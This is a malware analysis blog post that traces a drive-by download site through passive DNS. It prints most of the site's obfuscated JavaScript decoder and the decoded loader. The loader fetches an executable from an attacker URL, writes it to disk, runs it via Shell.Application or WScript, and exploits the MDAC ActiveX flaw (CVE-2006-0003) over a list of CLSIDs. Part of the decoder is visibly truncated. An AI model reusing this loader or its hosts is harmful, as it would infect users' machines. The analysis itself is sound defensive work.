Trojan.Js.Downloader.BDS Website with exploit and Malware

Warning: browse the reported links only with Malzilla.
Querying passive DNS replication services, which collect public DNS data, is a great way to investigate malware, and even better for researching suspicious IPs.

Today's attention is centred on the IP 78.47.186.165, which looks suspect; let's query the DNS replication service.

http://www.bfk.de/bfk_dnslogger_en.html?query=78.47.186.165#result

As you can see, we obtain the following list:

* wergnd.info A 78.47.186.165
* eyetje.info A 78.47.186.165
* dsfgng.info A 78.47.186.165
* sgfnsg.info A 78.47.186.165
* ltuyjm.info A 78.47.186.165
* dfgdet.info A 78.47.186.165
* etyjyt.info A 78.47.186.165
* eryjey.info A 78.47.186.165

Other domains hosted there:

*

etyjyt.info
kb923561.in
kb929399.in
kb936782.in
kb952004.in
kb959426.in
kb960225.in
kb960715.in
kb960803.in
kb960859.info
kb968389.info
ntwin.in

Our attention will be on egtrhn.info, precisely on

http://egtrhn.info//index.php?src=583&surl=www.springerrescue.org&sport=80&suri=%2Findex%2Ehtml

We have a first redirection to:
http://egtrhn.info/index2.php?src=583&trk=09181706298102074

where an obfuscated JS script is located:

// Analyst note: decoder for the obfuscated payload. z0 is the encoded string.
// t is a lookup table indexed by (charCode - 48), i.e. by printable characters
// counted from '0'; b = 0x400 means the input is consumed in 1024-character
// chunks, and each decoded chunk r is written into the page through
// eval("document.write(r)") at the end of the outer loop.
function get_pic(z0){
var zr0=0,i,j,zr1=”1″,ff=0xff,zr2=”2″,z9=0xc,zr3=3,b=0x400,r,z7=3,s=0,z8=”ss”,w=0,p=0,t=Array(63,56,55,60,4,31,16,19,20,27,0,0,0,0,0,0,25,42,18,22,49,30,24,51,8,62,46,36,59,61,58,17,54,45,53,48,41,47,0,1,3,21,10,0,0,0,0,44,0,13,28,33,5,11,39,7,34,29,15,50,43,12,26,57,2,9,35,23,6,14,40,38,32,52,37);
// z2/l/p are implicit globals (no var): input string, remaining length, read cursor.
z2=z0;l=z2.length;
for(j=Math.ceil(l/b);j>0;j–){r=”;
// NOTE(review): the next line is truncated by the page extraction — `z1<>8` is
// not valid JS, so the bit-shift/mask arithmetic between the angle brackets was
// lost. The inner loop as shown here is not runnable; only the table lookup
// (t[...-48]) and the chunking are reliably visible.
for(i=Math.min(l,b);i>0;l–,i–){z1=t[z2.charCodeAt(p++)-48];z3=z1<>8;s-=2;r=r+String.fromCharCode(z6)}
else{z7=8;s=6;z8=”7″;z9=w}}
// "document" + "." + "write" is assembled from fragments to avoid a literal
// document.write in the source; the result is then eval'd.
y1=”document”;
y2=”write”;
// Invocation: the call string get_pic("...") is itself built from fragments and
// eval'd. y5 and y6 appear unused (filler). {BLOCK_OF_DATA} is the author's
// placeholder for the elided encoded payload.
eval(y1+”.”+y2+”(r)”)}}y5=”f2″;y4=”get_pic”;y3=y4+'(“H0bIckN..{BLOCK_OF_DATA}..r3GolElDhnALr3G”)’;y6=”()”;eval(y3);

The function get_pic(z0) deobfuscates the block of data that I partially reported here; the algorithm used is pretty
simple and can be pasted directly into the Malzilla decoder. Here is the decoded block of data:

<div id=”demoobj”></div>
<script language=”javascript”>
var space=””;
function lsrn(pt31) {
var ldob=null; var tds1=17;
var st2=”2″;
var stms=”Microsoft”;
var stmss=”MS”;
var stxml=”XML”;
var stdt=”.”;
var stht=”HTTP”;
var stsrv=”Server”;
var url=”http://egtrhn.info/gfl.php?d=14&trk=09220521365129336&s=m06&#8243;;
var tds2=17;
var stgt=”GET”;
var std=”D”;
var stbd=”Body”;
var strsp=”response”;
var ev1=”ldob”+stdt+”open(stgt,url,false);”;
var stsv=”Save”;
try { ldob=objmker(pt31, stms+stdt+stxml+stht); eval(ev1); }
catch(e) {
try { ldob=objmker(pt31, stmss+stxml+st2+stdt+stxml+stht); eval(ev1); }
catch(e) {
try { ldob=objmker(pt31, stmss+stxml+st2+stdt+stsrv+stxml+stht); eval(ev1); }
catch(e) { try { ldob=new XMLHttpRequest(); eval(ev1); }
catch(e){ return 0;
};
};
};
};
try { ldob.send(null); }
catch(e) {
try { ldob.send(null); }
catch(e) { return 0;
};
};

As you can see from the bolded variable (url), this piece of code deals with the URL
http://egtrhn.info/gfl.php?d=14&trk=09220521365129336&s=m06
and this link serves a malicious executable.

eval(“ld”+stbd+”=ldob.”+strsp+stbd);
var obj_strm=objmker(pt31, “A”+std+”O”+std+”B.Stream”);
if (obj_strm) {
obj_strm.Type=1; obj_strm.Mode=3; obj_strm.Open(); obj_strm.Write(ldBody);
var hdrv=””; var dtemp=””; var dstart=””; var daustart=””;
try {var obj_WScript=objmker(pt31, “WScript.Shell”);
try{var wshProcEnv=obj_WScript.Environment(“PROCESS”); hdrv=wshProcEnv(“HOMEDRIVE”); dtemp=wshProcEnv(“TEMP”)
;}catch(e){   };
}
catch(e){};
if (hdrv==””) { hdrv=”C:”; };
if (dtemp==””) {
try {
var obj_fso=objmker(pt31, “Scripting.FileSystemObject”);
dtemp=obj_fso.GetSpecialFolder(2);
}catch(e){  };
};

Here the downloader for the malicious executable is built.

var fn2=””; var fn=””;
var strnd=Math.round(Math.random()*(100000-1)+10000);
var ev2=”obj_strm.”+stsv+”ToFile(fn,”+st2+”);fn2=fn;”;
if(fn2==””){try{Tv=dtemp;fn=Tv+”\\tmp”+strnd+”.exe”;eval(ev2);}catch(e){};};
if(fn2==””){try{Tv=hdrv;fn=Tv+”\\RECYCLER\\”+strnd+”.exe”;eval(ev2);}catch(e){};};
if(fn2==””){try{Tv=hdrv;fn=Tv+”\\sys”+strnd+”.exe”;eval(ev2);}catch(e){};};
if (fn2!=””){

A random value (strnd) is appended to the executable name.

var tst2=space;
var tobjst=tst2;
var falret=0;
try{
var zpa1=”var obj_shl=obj”+tst2+”mker(pt31,\”Sh”+tst2+”ell.”+tst2+”Application\”);”; eval(zpa1);
var zpa2=”obj_shl”+tst2+”.Sh”+tst2+”ellEx”+tst2+”ecute(fn2);”;eval(zpa2);
}catch(e){
try{
zpa3=”obj_W”+tst2+”Script.”+tst2+”Exec(fn2);”;eval(zpa3);
}catch(e){

Looking carefully at these three variables, you can see some well-known strings represented in a split form to deceive basic web checkers; here are the rebuilt strings:

* Shell.Application\
* obj_shl.ShellExecute(fn2)
* obj_WScript.Exec(fn2)

try{
zpa4=”var demoobj2=document.”+tst2+”getElem”+tst2+”ent”+tst2+”ById(\”demoobj\”);”;eval(zpa4);
var zpa5=”demoobj2″+tobjst+”.inner”+tst2+”HTML”+tobjst+”=demoobj2″+tobjst+”.inner”+
tst2+”HTML”+tobjst+”+\”<obj”+tst2+”ect”+tobjst+” clas”+tst2+”sid”+tobjst+”=’cls”+tst2+”id:”+tobjst+”5271″+tst2+”96a4-b1a3-4647-931d-37ba5″+tst2+”af23037″+tobjst+”‘ code”+tst2+”base=”+tobjst+”‘\”+fn2+\”‘></”+tobjst+”object”+tst2+”>\”;”;
eval(zpa5);
}catch(e){

zpa5 is the most interesting: among the various string fragments a CLSID is built.

clsid:527196a4-b1a3-4647-931d-37ba5af23037 belongs to the MDAC ActiveX
code execution vulnerability (CVE-2006-0003).

An attacker who successfully exploited this vulnerability could gain the same user rights
as the local user. Users whose accounts are configured to have fewer user rights on the
system could be less impacted than users who operate with administrative user rights.

return falret;
};
};
};
return 1;
}else{
return 0;
};
}else{return 0;};
};

// Analyst note: COM object factory used throughout the loader. pt21 is the host
// object (the <object> element created in the loop further down is what lsrn
// passes in), pt22 is the ProgID to instantiate. Each call signature is tried
// in turn and every failure is swallowed, so one missing control does not stop
// the script. Returns the created object, or null if every attempt failed.
function objmker(pt21,pt22) {
// tds is never read (filler). stem is an empty string spliced into the method
// names below purely to break naive string matching on "CreateObject"/"GetObject".
var tds=27; var nobj=null; var stno=”nobj=pt21.”; var stem=””;
// Each eval assigns to nobj; the try/catch hides any COM/scripting error.
try{eval(stno+’CreateObject(pt22)’);}catch(e){}
if(!nobj){try{eval(stno+’Cre’+stem+’ateO’+stem+’bject(pt22,””)’);}catch(e){}}
if(!nobj){try{eval(stno+’Cre’+stem+’ateO’+stem+’bject(pt22,””,””)’);}catch(e){}}
if(!nobj){try{eval(stno+’Get’+stem+’Obje’+stem+’ct(“”,pt22)’);}catch(e){}}
if(!nobj){try{eval(stno+’Get’+stem+’Obje’+stem+’ct(pt22,””)’);}catch(e){}}
if(!nobj){try{eval(stno+’Get’+stem+’Obje’+stem+’ct(pt22)’);}catch(e){}}
return(nobj);
}
// Analyst note: i is the loop counter for the while loop below; stcb1, st1m and
// stm1 are CLSID fragments that are concatenated back at runtime so the full
// CLSIDs never appear as literals. tds is never read (filler).
var tds=17; var i=0; var stcb1=”-0000-0000-C000-000000000046″; var st1m=”1-“; var stm1=”-1″;
// hncx: the list of ActiveX CLSIDs the loader will try, in order; the trailing
// null terminates the while loop. The reassembled values are listed in the text
// that follows.
var hncx=new Array(“BD96C556-65A3″+stm1+”1D0-983A-00C04FC29E36″,”AB9BCEDD-EC7E-47E”+st1m+”9322-D4A210617116″,”0006F033″+stcb1,”0006F03A”+stcb1,”6E32070A-766D-4EE6-879C-DC1FA91D2FC3″,”6414512B-B978-451D-A0D8-FCFDF33E833C”,”7F5B7F63-F06F-433″+st1m+”8A26-339E03C0AE3D”,”06723E09-F4C2-43c8-8358-09FCD1DB0766″,”639F725F”+stm1+”B2D-483″+st1m+”A9FD-874847682010″,”BA018599″+stm1+”DB3-44f9-83B4-461454C84BF8″,”D0C07D56-7C69-43F”+st1m+”B4A0-25F5A11FAB19″,”E8CCCDDF-CA28-496b-B050-6C07C962476B”,null);

Let's isolate some hardcoded values and research them.

BD96C556-65A3-11D0-983A-00C04FC29E36

This CLSID belongs to the Internet Explorer MDAC vulnerability.

The other CLSIDs used are:

* {BD96C556-65A3-11D0-983A-00C04FC29E30}
* {BD96C556-65A3-11D0-983A-00C04FC29E36}
* {AB9BCEDD-EC7E-47E1-9322-D4A210617116}
* {0006F033-0000-0000-C000-000000000046}
* {0006F03A-0000-0000-C000-000000000046}
* {6e32070a-766d-4ee6-879c-dc1fa91d2fc3}
* {6414512B-B978-451D-A0D8-FCFDF33E833C}
* {7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
* {06723E09-F4C2-43c8-8358-09FCD1DB0766}
* {639F725F-1B2D-4831-A9FD-874847682010}
* {BA018599-1DB3-44f9-83B4-461454C84BF8}
* {D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
* {E8CCCDDF-CA28-496b-B050-6C07C962476B}

// Analyst note: driver loop. For every CLSID in hncx an <object> element with
// id "obj_RDS<i>" and classid "clsid:<CLSID>" is created and handed to lsrn,
// which does the download-and-run attempt; the loop stops at the first CLSID
// for which lsrn returns a truthy value. Errors from createElement/setAttribute
// and from lsrn are all swallowed. For defenders, the "obj_RDS" id prefix and
// the burst of <object> elements with classid attributes are what shows up in
// the DOM.
var stob=”object”; var stid=”id”; var strd=”obj_RDS”; var iuump=null;
while (hncx[i]) {
try{
iuump=null;iuump=document.createElement(stob);iuump.setAttribute(stid,strd+i);iuump.setAttribute(“class”+stid,”cls”+stid+”:”+hncx[i]);
}catch(e){};
// lsrn(iuump) is the function shown earlier in the post (its body is cut by
// the commentary there); a truthy return means the attempt succeeded.
if(iuump){try{if(lsrn(iuump)){break;};}catch(e){};};
i++;
}
</script>
</body>
</html>

In conclusion, this JavaScript downloads the infected file into the root directory “C:\” with this name (note that, as the code above shows, it first tries the TEMP folder and then a RECYCLER subfolder, and falls back to the drive root only if those writes fail):

* “sys[4 random letters].exe”

Regards,

Giuseppe ‘Evilcry’ Bonfa’
